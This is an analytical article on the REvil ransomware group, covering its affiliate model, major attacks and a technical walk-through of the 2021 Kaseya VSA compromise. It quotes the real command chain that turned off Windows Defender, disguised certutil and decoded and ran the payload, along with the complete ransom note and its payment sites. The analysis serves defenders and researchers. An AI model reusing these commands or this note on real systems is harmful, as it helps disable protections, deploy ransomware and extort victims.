The REvil is in the details

The REvil (also known as Sodinokibi) ransomware operation has taken the spotlight in recent years. The Russian group operates by direct attacks, and also in a ransomware-as-a-service (RaaS) model, through affiliates who provide access to networks, carry out ransomware attacks or negotiate on behalf of REvil.

In the RaaS model, affiliates keep about 70% of profits, with the remaining 30% going to the RaaS operator in exchange for customizable ransomware software, documentation or a support community. Sometimes RaaS even features full-fledged portals that lets affiliates track their infected victim systems, chat with victims to handle negotiations, and deal with payments.

REvil is said to have scammed some of its own affiliates out of their 70% cut, by hijacking affiliates’ negotiation chat sessions with the victims, and using a backdoor in the ransomware code for decrypting files.

Some of REvil’s notable attacks:

• 2020 May: Based on data stolen from a New York law firm, they went as far as trying to extort then U.S. President Donald Trump for $42 million.
• 2021 March: Downloaded data and installed ransomware on Acer‘s internal systems, demanding $50 million for decrypting files and not leaking the data.
• 2021 April: REvil stole plans of upcoming Apple laptops and a new Apple Watch, information that proved to be accurate. They demanded $50 million for not releasing the documents publicly.
• 2021 May: U.S. meatpacker JBS was forced to shut down production and eventually paid a $11 million ransom.
• 2021 June: Major Brazilian healthcare provider Grupo Fleury hit by ransomware attack, leaving patients unable to book appointments online, with a $5 million ransom demand.
• 2021 July 2: Hundreds of MSPs were infected with REvil ransomware through Kaseya’s VSA IT management solution. This in turn caused infections and downtime for clients of those MSPs, up to 1500 companies. Swedish grocery store chain Coop was one of the victims. It couldn’t operate cash registers, and as a consequence closed all 800 of its stores for several days.
• 2021 July 7: REvil hacked HX5, a Florida-based defense contractor, which has the U.S. Army, the Navy, the Air Force and NASA among its clients, releasing some of the leaked documents on their dark web page, the Happy Blog.

Let’s look at the techniques REvil used in the Kaseya VSA ransomware attack in 2021 July.

Kaseya VSA ransomware attack

Kaseya VSA is an IT management software that helps deal with a large number of computers remotely, with features like patch management, monitoring or device inventory. It communicates with agent software running on endpoints.

Initial foothold on multiple Kaseya VSA on-prem servers run by MSPs was established using an authentication bypass vulnerability (CVE-2021-30116) on the web interface of VSA. The software also had a number of SQL injection vulnerabilities, one these was confirmed as the first code execution step.

After gaining command execution on VSA servers, ransomware was deployed to endpoints by creating a procedure in VSA called “Kaseya VSA Agent Hot-fix”:

The “Kaseya VSA Agent Hot-fix” procedure dropped a base64 encoded executable named agent.crt on endpoints, and executed the following command chain:

"C:\WINDOWS\system32\cmd.exe" /c ping 127.0.0.1 -n 4979 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe

The above commands first disable Windows Defender features such as real-time protection or the scanning of downloaded files and attachments. Then a copy of the Windows certutil.exe tool is made.

While certutil is in itself a legit application, it is abused in living off the land attacks so often that some security solutions pick up on direct executions. Copying it to C:\Windows\cert.exe could be a way to circumvent those protections.

For added obfuscation, some random bytes are appended to the copied cert.exe, possibly to avoid hash-based detection: echo %RANDOM% >> C:\Windows\cert.exe

Finally, the agent.crt payload is base64 decoded: C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe, and the decoded file is executed: c:\kworking\agent.exe

agent.exe has two files packed in it, MsMpEng.exe and mpsvc.dll. The former is a legit, validly signed version of a core Microsoft Defender executable, but it’s an older version from March 2014.

mpsvc.dll contains the REvil/Sodinokibi ransomware encryptor payload, this one has a valid signature too.

These two files are normally found in c:\Program Files\Windows Defender\, but these malicious versions are placed in the C:\Windows\ directory. agent.exe executes MsMpEng.exe, which loads the malicious mpsvc.dll. This DLL sideloading technique with similar payloads was observed as early as 2019.

The ransomware payload contains JSON configuration encrypted with RC4 and a static key, an example configuration can be found here: https://gist.github.com/fwosar/a63e1249bfccb8395b961d3d780c0354

This ransom note was dropped on victim systems with the filename {EXT}-readme.txt, e.g. rec953d-readme.txt:

---=== Welcome. Again. ===---
[-] Whats HapPen? [-]
Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension {EXT}.
By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER).
[+] What guarantees? [+]
Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests.
To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee.
If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money.
[+] How to get access on website? [+]
You have two ways:
    [Recommended] Using a TOR browser!
a) Download and install TOR browser from this site: https://torproject.org/
b) Open our website: hxxp://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd[.]onion/{UID}
    If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this:
a) Open your any browser (Chrome, Firefox, Opera, IE, Edge)
b) Open our secondary website: hxxp://decoder[.]re/{UID}
Warning: secondary website can be blocked, thats why first variant much better and more available.
When you open our website, put the following data in the input form:
Key:
{KEY}

Some variables in the ransom note above are substituted at runtime:

• {EXT} is the random-generated file extension appended to encrypted files
• {UID} is the unique identifier of the victim, based on the system volume serial number and CPUID
• {KEY} contains base64 encoded statistics of the victim system, such as system language, CPU architecture, operating system information, the workgroup name and hostname

It also displayed this text on the desktop wallpaper:

All of your files are encrypted!
Find {EXT}-readme.txt and follow instuctions

The ransomware was coded to skip systems from these post-Soviet states, based on the default system language: Russia, Ukraine, Uzbekistan, Kazakhstan, Syria, Azerbaijan, Belarus, Tajikistan, Kyrgyzstan, Turkmenistan, Moldova, Georgia, Armenia.

Kaseya asked their customers to shut down their on-prem VSA instances to prevent further compromise, and Kaseya shut down all of their own SaaS VSA instances as well.

The REvil group took credit through their Happy Blog page, asking for $70 million to release the master encryption key that would unlock all of the encrypted files of the over 1000 companies affected, but companies could negotiate independently as well. They later lowered the ransom demand to $50 million, but it still wasn’t paid.

On 2021 September 16, Bitdefender in collaboration with law enforcement released a universal decryptor tool, which can be used to recover from REvil ransomware attacks made before 2021 July 13: https://www.bitdefender.com/blog/labs/bitdefender-offers-free-universal-decryptor-for-revil-sodinokibi-ransomware/

REvil’s disappearance

Days after the Kaseya attack and HX5 defense contractor’s hack by REvil, on 2021 July 9, U.S. President Joe Biden stated after a phone call with Russian President Vladimir Putin:

“I made it very clear to him that the United States expects when a ransomware operation is coming from his soil even though it’s not sponsored by the state, we expect them to act if we give them enough information to act on who that is.”

A senior official said that they expected results soon:

“We’re not going to telegraph what those actions will be precisely – some of them will be manifest and visible, some of them may not be – but we expect those to take place, you know, in the days and weeks ahead”

By July 13 REvil’s dark web and other websites and infrastructure were shut down.

It’s unclear whether this was caused by law enforcement, or preemptively done by REvil. The website briefly came back online again, but is offline since October.

On 2021 October 21, Tom Kellermann, an adviser to the U.S. Secret Service on cybercrime investigations, stated:

“The FBI, in conjunction with Cyber Command, the Secret Service and like-minded countries, have truly engaged in significant disruptive actions against these groups.”
“REvil was top of the list.”

An REvil operator said on an underground forum that REvil’s servers were hacked, and also:

“The server was compromised, and they were looking for me.”
“Good luck, everyone; I’m off.”

It was after this attack that the FBI released the master decryption key.